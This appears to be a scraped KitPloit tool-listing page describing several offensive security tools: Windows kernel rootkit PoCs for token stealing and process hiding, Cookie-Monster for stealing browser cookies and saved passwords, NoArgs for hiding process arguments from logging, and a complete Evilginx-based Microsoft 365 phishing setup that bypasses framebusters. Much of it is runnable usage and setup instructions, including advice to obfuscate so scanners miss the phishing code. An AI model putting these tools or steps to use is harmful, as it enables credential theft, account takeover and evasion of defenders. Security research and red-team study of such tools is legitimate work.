    Thanks to BertJanCyber for creating the KQL query for ingesting this feed

    And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

    What do I track?

    Running Locally

    If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY

    echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
    bash
    python3 -m pip install -r requirements.txt
    python3 tracker.py

    Contributing

    I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).

    References



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    VectorKernel - PoCs For Kernelmode Rootkit Techniques Research

    By: Zion3R β€” April 18th 2024 at 12:30


    PoCs for Kernelmode rootkit techniques research or education. Currently focusing on Windows OS. All modules support 64bit OS only.

    NOTE

    Some modules use ExAllocatePool2 API to allocate kernel pool memory. ExAllocatePool2 API is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules in old OSes, replace ExAllocatePool2 API with ExAllocatePoolWithTag API.

    Β 

    Environment

    All modules are tested in Windows 11 x64. To test drivers, following options can be used for the testing machine:

    1. Enable Loading of Test Signed Drivers

    2. debugging-in-windbg--cdb--or-ntsd">Setting Up Kernel-Mode Debugging

    Each options require to disable secure boot.

    Modules

    Detailed information is given in README.md in each project's directories. All modules are tested in Windows 11.

    Module Name Description
    BlockImageLoad PoCs to block driver loading with Load Image Notify Callback method.
    BlockNewProc PoCs to block new process with Process Notify Callback method.
    CreateToken PoCs to get full privileged SYSTEM token with ZwCreateToken() API.
    DropProcAccess PoCs to drop process handle access with Object Notify Callback.
    GetFullPrivs PoCs to get full privileges with DKOM method.
    GetProcHandle PoCs to get full access process handle from kernelmode.
    InjectLibrary PoCs to perform DLL injection with Kernel APC Injection method.
    ModHide PoCs to hide loaded kernel drivers with DKOM method.
    ProcHide PoCs to hide process with DKOM method.
    ProcProtect PoCs to manipulate Protected Process.
    QueryModule PoCs to perform retrieving kernel driver loaded address information.
    StealToken PoCs to perform token stealing from kernelmode.

    TODO

    More PoCs especially about following things will be added later:

    • Notify callback
    • Filesystem mini-filter
    • Network mini-filter

    Recommended References



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Cookie-Monster - BOF To Steal Browser Cookies & Credentials

    By: Zion3R β€” April 17th 2024 at 12:30


    Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.


    BOF Usage

    Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
    cookie-monster Example:
    cookie-monster --chrome
    cookie-monster --edge
    cookie-moster --firefox
    cookie-monster --chromeCookiePID 1337
    cookie-monster --chromeLoginDataPID 1337
    cookie-monster --edgeCookiePID 4444
    cookie-monster --edgeLoginDataPID 4444
    cookie-monster Options:
    --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --firefox, looks for profiles.ini and locates the key4.db and logins.json file
    --chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
    --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

    EXE usage

    Cookie Monster Example:
    cookie-monster.exe --all
    Cookie Monster Options:
    -h, --help Show this help message and exit
    --all Run chrome, edge, and firefox methods
    --edge Extract edge keys and download Cookies/Login Data file to PWD
    --chrome Extract chrome keys and download Cookies/Login Data file to PWD
    --firefox Locate firefox key and Cookies, does not make a copy of either file

    Decryption Steps

    Install requirements

    pip3 install -r requirements.txt

    Base64 encode the webkit masterkey

    python3 base64-encode.py "\xec\xfc...."

    Decrypt Chrome/Edge Cookies File

    python .\decrypt.py "XHh..." --cookies ChromeCookie.db

    Results Example:
    -----------------------------------
    Host: .github.com
    Path: /
    Name: dotcom_user
    Cookie: KingOfTheNOPs
    Expires: Oct 28 2024 21:25:22

    Host: github.com
    Path: /
    Name: user_session
    Cookie: x123.....
    Expires: Nov 11 2023 21:25:22

    Decrypt Chome/Edge Passwords File

    python .\decrypt.py "XHh..." --passwords ChromePasswords.db

    Results Example:
    -----------------------------------
    URL: https://test.com/
    Username: tester
    Password: McTesty

    Decrypt Firefox Cookies and Stored Credentials:
    https://github.com/lclevy/firepwd

    Installation

    Ensure Mingw-w64 and make is installed on the linux prior to compiling.

    make

    to compile exe on windows

    gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

    TO-DO

    • update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

    References

    This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
    Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
    Fileless download: https://github.com/fortra/nanodump
    Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected

    By: Zion3R β€” April 16th 2024 at 12:30


    NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.


    Default Cmd:


    Windows Event Logs:


    Using NoArgs:


    Windows Event Logs:


    Functionality Overview

    The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.

    Hooking Mechanism

    Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.

    Process Environment Block (PEB) Manipulation

    The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.

    Demo: Running Mimikatz and passing it the arguments:

    Process Hacker View:


    All the arguemnts are hidden dynamically

    Process Monitor View:


    Technical Implementation

    1. Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)

    2. Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.

    3. Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary.

    4. PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.

    5. Execution Redirection: Upon completion of the manipulations, the execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that relay on getting the process details from the PEB.

    Installation and Usage:

    Option 1: Compile NoArgs DLL:

    • You will need microsoft/Detours">Microsoft Detours installed.

    • Compile the DLL.

    • Inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically.

    Option 2: Download the compiled executable (ready-to-go) from the releases page.

    Refrences:

    • https://en.wikipedia.org/wiki/Microsoft_Detours
    • https://github.com/microsoft/Detours
    • https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
    • https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

    By: Zion3R β€” April 15th 2024 at 12:30


    A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

    This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


    Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. β–Ά Watch Video

    β˜•οΈŽ Buy Me A Coffee

    Video Tutorial: πŸ‘‡

    Disclaimer

    This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

    Backstory - The Why

    Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

    That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

    The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

    In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

    The What

    A Browser In The Browser (BITB) without any iframes! As simple as that.

    Meaning that we can now use BITB with Evilginx on websites like Microsoft.

    Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

    The How

    Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.

    Instructions

    Video Tutorial


    Local VM:

    Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

    Update and Upgrade system packages:

    sudo apt update && sudo apt upgrade -y

    Evilginx Setup:

    Optional:

    Create a new evilginx user, and add user to sudo group:

    sudo su

    adduser evilginx

    usermod -aG sudo evilginx

    Test that evilginx user is in sudo group:

    su - evilginx

    sudo ls -la /root

    Navigate to users home dir:

    cd /home/evilginx

    (You can do everything as sudo user as well since we're running everything locally)

    Setting Up Evilginx

    Download and build Evilginx: Official Docs

    Copy Evilginx files to /home/evilginx

    Install Go: Official Docs

    wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
    sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
    nano ~/.profile

    ADD: export PATH=$PATH:/usr/local/go/bin

    source ~/.profile

    Check:

    go version

    Install make:

    sudo apt install make

    Build Evilginx:

    cd /home/evilginx/evilginx2
    make

    Create a new directory for our evilginx build along with phishlets and redirectors:

    mkdir /home/evilginx/evilginx

    Copy build, phishlets, and redirectors:

    cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

    cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

    cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

    Ubuntu firewall quick fix (thanks to @kgretzky)

    sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

    On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

    sudo nano /etc/systemd/resolved.conf

    edit/add the DNSStubListener to no > DNSStubListener=no

    then

    sudo systemctl restart systemd-resolved

    Modify Evilginx Configurations:

    Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

    nano ~/.evilginx/config.json

    CHANGE https_port from 443 to 8443

    Install Apache2 and Enable Mods:

    Install Apache2:

    sudo apt install apache2 -y

    Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

    sudo a2enmod proxy
    sudo a2enmod proxy_http
    sudo a2enmod proxy_balancer
    sudo a2enmod lbmethod_byrequests
    sudo a2enmod env
    sudo a2enmod include
    sudo a2enmod setenvif
    sudo a2enmod ssl
    sudo a2ensite default-ssl
    sudo a2enmod cache
    sudo a2enmod substitute
    sudo a2enmod headers
    sudo a2enmod rewrite
    sudo a2dismod access_compat

    Start and enable Apache:

    sudo systemctl start apache2
    sudo systemctl enable apache2

    Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.

    Clone this Repo:

    Install git if not already available:

    sudo apt -y install git

    Clone this repo:

    git clone https://github.com/waelmas/frameless-bitb
    cd frameless-bitb

    Apache Custom Pages:

    Make directories for the pages we will be serving:

    • home: (Optional) Homepage (at base domain)
    • primary: Landing page (background)
    • secondary: BITB Window (foreground)
    sudo mkdir /var/www/home
    sudo mkdir /var/www/primary
    sudo mkdir /var/www/secondary

    Copy the directories for each page:


    sudo cp -r ./pages/home/ /var/www/

    sudo cp -r ./pages/primary/ /var/www/

    sudo cp -r ./pages/secondary/ /var/www/

    Optional: Remove the default Apache page (not used):

    sudo rm -r /var/www/html/

    Copy the O365 phishlet to phishlets directory:

    sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

    Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

    Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

    Self-signed SSL certificates:

    Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

    We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

    Create dir and parents if they do not exist:

    sudo mkdir -p /etc/ssl/localcerts/fake.com/

    Generate the SSL certs using the OpenSSL config file:

    sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
    -keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
    -config openssl-local.cnf

    Modify private key permissions:

    sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

    Apache Custom Configs:

    Copy custom substitution files (the core of our approach):

    sudo cp -r ./custom-subs /etc/apache2/custom-subs

    Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.

    Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

    # Uncomment the one you want and remember to restart Apache after any changes:
    #Include /etc/apache2/custom-subs/win-chrome.conf
    Include /etc/apache2/custom-subs/mac-chrome.conf

    Simply to make it easier, I included both versions as separate files for this next step.

    Windows/Chrome BITB:

    sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

    Mac/Chrome BITB:

    sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

    Test Apache configs to ensure there are no errors:

    sudo apache2ctl configtest

    Restart Apache to apply changes:

    sudo systemctl restart apache2

    Modifying Hosts:

    Get the IP of the VM using ifconfig and note it somewhere for the next step.

    We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

    On Windows:

    Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

    Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:

    C:\Windows\System32\drivers\etc\

    Change the file types (bottom-right) to "All files".

    Double-click the file named hosts

    On Mac:

    Open a terminal and run the following:

    sudo nano /private/etc/hosts

    Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

    # Local Apache and Evilginx Setup
    [IP] login.fake.com
    [IP] account.fake.com
    [IP] sso.fake.com
    [IP] www.fake.com
    [IP] portal.fake.com
    [IP] fake.com
    # End of section

    Save and exit.

    Now restart your browser before moving to the next step.

    Note: On Mac, use the following command to flush the DNS cache:

    sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

    Important Note:

    This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the 127.0.0.1 with the actual local IP of your VM.

    Trusting the Self-Signed SSL Certs:

    Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

    For this step, it's easier to follow the video instructions, but here is the gist anyway.

    Open https://fake.com/ in your Chrome browser.

    Ignore the Unsafe Site warning and proceed to the page.

    Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

    Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".

    On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

    Now RESTART your Browser

    You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

    Running Evilginx:

    At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

    Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

    sudo apt install tmux -y

    Start Evilginx in developer mode (using tmux to avoid losing the session):

    tmux new-session -s evilginx
    cd ~/evilginx/
    ./evilginx -developer

    (To re-attach to the tmux session use tmux attach-session -t evilginx)

    Evilginx Config:

    config domain fake.com
    config ipv4 127.0.0.1

    IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

    blacklist noadd

    Setup Phishlet and Lure:

    phishlets hostname O365 fake.com
    phishlets enable O365
    lures create O365
    lures get-url 0

    Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

    Useful Resources

    Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

    Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

    My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

    How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

    Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

    TODO

    • Create script(s) to automate most of the steps


    ❌